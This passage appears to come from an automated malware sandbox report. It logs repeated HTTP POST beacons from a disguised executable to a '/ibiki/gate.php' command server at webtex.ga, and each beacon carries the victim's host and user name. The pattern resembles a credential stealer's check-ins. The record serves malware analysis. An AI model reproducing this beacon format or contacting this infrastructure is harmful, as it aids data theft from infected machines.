                                    Dec 3, 2020 10:04:14.465338945 CET4896INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:31 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    271192.168.2.35001647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:14.692821980 CET4897OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:14.709280014 CET4897OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:14.751430988 CET4898INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:31 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    272192.168.2.35001747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:14.958775997 CET4898OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:14.975238085 CET4899OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:15.017358065 CET4899INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:32 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    273192.168.2.35001847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:15.237436056 CET4900OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:15.257222891 CET4900OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:15.303064108 CET4900INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:32 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    274192.168.2.35001947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:15.514678955 CET4901OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:15.531507969 CET4901OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:15.574409008 CET4902INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:32 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    275192.168.2.35002047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:15.796982050 CET4903OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:15.813976049 CET4903OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:15.856977940 CET4903INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:33 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    276192.168.2.35002147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:16.076667070 CET4904OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:16.097709894 CET4904OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:16.139504910 CET4905INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:33 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    277192.168.2.35002247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:16.567527056 CET4905OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:16.584451914 CET4906OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:16.627367973 CET4906INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:33 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    278192.168.2.35002347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:16.871689081 CET4907OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:16.891112089 CET4907OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:16.927499056 CET4907INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:34 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    279192.168.2.35002447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:17.160446882 CET4908OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:17.177095890 CET4908OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:17.228399038 CET4909INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:34 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    28192.168.2.34974247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.771995068 CET131OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.788624048 CET131OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:40.829597950 CET132INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    280192.168.2.35002547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:17.884115934 CET4909OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:17.901098967 CET4910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:17.950229883 CET4910INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:35 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    281192.168.2.35002647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:18.181600094 CET4911OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:18.198190928 CET4911OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:18.240684986 CET4911INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:35 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    282192.168.2.35002747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:19.967293024 CET4912OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:19.984064102 CET4912OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:20.027369022 CET4913INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    283192.168.2.35002847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:20.275988102 CET4914OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:20.292846918 CET4914OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:20.335599899 CET4914INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    284192.168.2.35002947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:20.550108910 CET4915OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:20.566878080 CET4915OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:20.616817951 CET4915INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    285192.168.2.35003047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:20.852617025 CET4916OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:20.869508982 CET4917OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:21.067117929 CET4917INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:38 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    286192.168.2.35003147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:21.297703028 CET4918OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:21.314348936 CET4918OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:21.363495111 CET4918INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:38 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    287192.168.2.35003247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:21.576517105 CET4919OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:21.593246937 CET4919OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:21.640626907 CET4920INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:38 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    288192.168.2.35003347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:21.902507067 CET4920OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:21.920439959 CET4921OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:21.955470085 CET4921INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:39 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    289192.168.2.35003447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
